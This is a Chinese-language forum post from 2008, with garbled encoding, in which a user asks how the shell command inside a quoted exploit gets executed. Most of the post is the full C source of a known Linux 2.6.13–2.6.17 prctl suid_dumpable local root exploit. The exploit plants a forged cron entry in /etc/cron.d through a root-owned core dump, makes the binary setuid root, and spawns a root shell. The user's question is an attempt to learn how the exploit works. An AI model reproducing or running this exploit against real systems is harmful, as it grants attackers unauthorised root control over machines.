- 論壇徽章:
- 0
|
今天看了看下面這段代碼���,在2.6.13上可以提升權(quán)限�,但是代碼里面的shell命令又是如何被執(zhí)行到的�����?
程序好像是利用2.6.13-2.6.17的內(nèi)核之間coredump的漏洞����,把權(quán)限返回給父進(jìn)程,最終獲得權(quán)限提升
http://www.milw0rm.com/exploits/2005
- /* Linux >= 2.6.13 prctl kernel exploit
- *
- * (C) Julien TINNES
- *
- * If you read the Changelog from 2.6.13 you've probably seen:
- * [PATCH] setuid core dump
- *
- * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
- * user setable argument to PR_SET_DUMPABLE.
- *
- * This flaw allows us to create a root owned coredump into any directory.
- * This is trivially exploitable.
- *
- */
- #include <sys/types.h>
- #include <sys/time.h>
- #include <sys/resource.h>
- #include <sys/prctl.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <errno.h>
- #include <signal.h>
- #include <stdlib.h>
- #include <time.h>
- #define CROND "/etc/cron.d"
- #define BUFSIZE 2048
- struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
- char crontemplate[]=
- "#/etc/cron.d/core suid_dumpable exploit\n"
- "SHELL=/bin/sh\n"
- "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
- "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
- char cronstring[BUFSIZE];
- char fname[BUFSIZE];
- struct timeval te;
- void sh(int sn) {
- execl(fname, fname, (char *) NULL);
- }
-
- int main(int argc, char *argv[]) {
- int nw, pid;
- if (geteuid() == 0) {
- printf("[+] getting root shell\n");
- setuid(0);
- setgid(0);
- if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
- perror("[-] execle");
- return 1;
- }
- }
- printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
- /* get our file name */
- if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
- perror("[-] readlink");
- printf("This is not fatal, rewrite the exploit\n");
- }
- if (signal(SIGUSR1, sh) == SIG_ERR) {
- perror("[-] signal");
- return 1;
- }
- printf("[+] Installed signal handler\n");
- /* Let us create core files */
- setrlimit(RLIMIT_CORE, &myrlimit);
- if (chdir(CROND) == -1) {
- perror("[-] chdir");
- return 1;
- }
- /* exploit the flaw */
- if (prctl(PR_SET_DUMPABLE, 2) == -1) {
- perror("[-] prtctl");
- printf("Is you kernel version >= 2.6.13 ?\n");
- return 1;
- }
- printf("[+] We are suidsafe dumpable!\n");
- /* Forge the string for our core dump */
- nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
- if (nw >= sizeof(cronstring)) {
- printf("[-] cronstring is too small\n");
- return 1;
- }
- printf("[+] Malicious string forged\n");
- if ((pid=fork()) == -1) {
- perror("[-] fork");
- return 1;
- }
- if (pid == 0) {
- /* This is not the good way to do it ;) */
- sleep(120);
- exit(0);
- }
- /* SEGFAULT the child */
- printf("[+] Segfaulting child\n");
- if (kill(pid, 11) == -1) {
- perror("[-] kill");
- return 1;
- }
- if (gettimeofday(&te, NULL) == 0)
- printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
- sleep(120);
- printf("[-] It looks like the exploit failed\n");
- return 1;
- }
- // milw0rm.com [2006-07-12]
- char crontemplate[]=
- "#/etc/cron.d/core suid_dumpable exploit\n"
- "SHELL=/bin/sh\n"
- "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
- "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
這個(gè)地方�����,跟著代碼調(diào)了好久好久����,我還是沒(méi)有明白它是如何被執(zhí)行到的,請(qǐng)知道的朋友說(shuō)一聲����,謝謝:)
[ 本帖最后由 hongmy525 于 2008-5-27 20:39 編輯 ] |
|
免費(fèi)注冊(cè)
發(fā)表于 2008-05-27 20:35
